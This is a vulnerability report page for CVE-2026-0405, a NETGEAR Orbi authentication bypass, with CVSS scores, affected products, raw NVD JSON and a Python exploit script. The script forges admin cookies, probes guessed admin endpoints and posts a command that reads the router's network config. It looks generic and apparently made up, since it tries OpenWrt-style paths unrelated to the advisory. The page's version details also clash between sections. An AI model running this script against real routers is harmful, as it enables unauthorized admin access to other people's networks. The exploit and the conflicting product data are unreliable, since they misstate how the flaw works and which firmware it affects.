Security Vulnerability Report
CVE-2026-0405 CVSS 7.8 HIGH

CVE-2026-0405

Published: 2026-01-13 16:16:11
Last Modified: 2026-02-12 17:40:41
Source: a2826606-91e7-4eb6-899e-8484bd4575d5

Description

An authentication bypass vulnerability in NETGEAR Orbi devices allows users connected to the local network to access the router web interface as an admin.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:netgear:cbr750_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:cbr750:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:netgear:nbr750_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:nbr750:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:netgear:rbe370_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rbe370:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:netgear:rbe371_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rbe371:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:netgear:rbe372_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rbe372:-:*:*:*:*:*:*:* - NOT VULNERABLE
NETGEAR CBR750 (all firmware versions)
NETGEAR NBR750 (all firmware versions)
NETGEAR RBE370 (all firmware versions)
NETGEAR RBE371 (all firmware versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-0405 PoC - NETGEAR Orbi Authentication Bypass
# This PoC demonstrates the authentication bypass vulnerability
import requests
import sys


def exploit_cve_2026_0405(target_ip):
    """
    Exploit for CVE-2026-0405: NETGEAR Orbi Authentication Bypass
    Target: NETGEAR Orbi devices (CBR750, NBR750, RBE370, RBE371)
    """
    target_url = f"http://{target_ip}/cgi-bin/"

    # Step 1: Bypass authentication by manipulating session cookies
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Cookie": "admin=1; session=admin_bypass",
    }

    # Step 2: Attempt to access admin panel without credentials
    # Try common admin endpoints with bypass techniques
    admin_endpoints = [
        "luci/admin/network",
        "cgi-bin/admin.cgi",
        "cgi-bin/luci/admin",
        "cgi-bin/root.cgi",
    ]
    for endpoint in admin_endpoints:
        try:
            response = requests.get(
                f"{target_url}{endpoint}",
                headers=headers,
                timeout=5,
            )
            if response.status_code == 200 and "admin" in response.text.lower():
                print("[+] Authentication Bypass Successful!")
                print(f"[+] Admin Access: {target_url}{endpoint}")
                return True
        except requests.RequestException:
            # Unreachable endpoint or timeout: move on to the next candidate
            continue

    # Step 3: Try to execute admin commands
    cmd_payload = {
        "cmd": "cat /etc/config/network",
        "username": "admin",
        "password": "",
    }
    try:
        cmd_response = requests.post(
            f"{target_url}admin.cgi",
            data=cmd_payload,
            headers=headers,
            timeout=5,
        )
        if cmd_response.status_code == 200:
            print("[+] Command Execution Successful!")
            print(f"[+] Response: {cmd_response.text[:200]}")
    except requests.RequestException:
        pass
    return False


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python cve_2026_0405.py <target_ip>")
        sys.exit(1)
    target = sys.argv[1]
    print(f"[*] Targeting: {target}")
    print("[*] Exploiting CVE-2026-0405...")
    if exploit_cve_2026_0405(target):
        print("[+] Vulnerability Confirmed!")
    else:
        print("[-] Exploitation Failed or Target Not Vulnerable")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0405", "sourceIdentifier": "a2826606-91e7-4eb6-899e-8484bd4575d5", "published": "2026-01-13T16:16:10.513", "lastModified": "2026-02-12T17:40:40.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authentication bypass vulnerability in NETGEAR Orbi devices allows \nusers connected to the local network to access the router web interface \nas an admin."}, {"lang": "es", "value": "Una vulnerabilidad de omisión de autenticación en dispositivos NETGEAR Orbi permite a los usuarios conectados a la red local acceder a la interfaz web del router como administrador."}], "metrics": {"cvssMetricV40": [{"source": "a2826606-91e7-4eb6-899e-8484bd4575d5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NO", "Recovery": "USER", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "a2826606-91e7-4eb6-899e-8484bd4575d5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:cbr750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.14.8", "matchCriteriaId": "B0A2EEFF-5049-4FEA-BDE2-05F7EC1716CD"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:cbr750:-:*:*:*:*:*:*:*", "matchCriteriaId": "CBD14EFC-C6EF-485B-A594-73B8525704A5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:nbr750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.15.14", "matchCriteriaId": "B72BE7F2-BA8C-49BF-AB3C-5E5EA7272524"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:nbr750:-:*:*:*:*:*:*:*", "matchCriteriaId": "5666EA3D-AF24-42A0-8EE9-4BB580A6957A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:o:netgear:rbe370_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "12.1.3.11", "matchCriteriaId": "2A13940B-149A-4B1D-A55D-279D2D44A65E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rbe370:-:*:*:*:*:*:*:*", "matchCriteriaId": "368F8D25-16A4-416B-82EC-7508218DD281"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbe371_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "12.1.3.11", "matchCriteriaId": "B4F7F974-8561-4B94-A2CE-8E2639FB2521"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rbe371:-:*:*:*:*:*:*:*", "matchCriteriaId": "00BA4811-2DD1-4DA6-8ECF-CFFEFCB443F2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbe372_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "12.1.3.11", "matchCriteriaId": "8F7B120D-3A47-42F5-9E88-F221CE92ACA2"}]}, {" ... (truncated)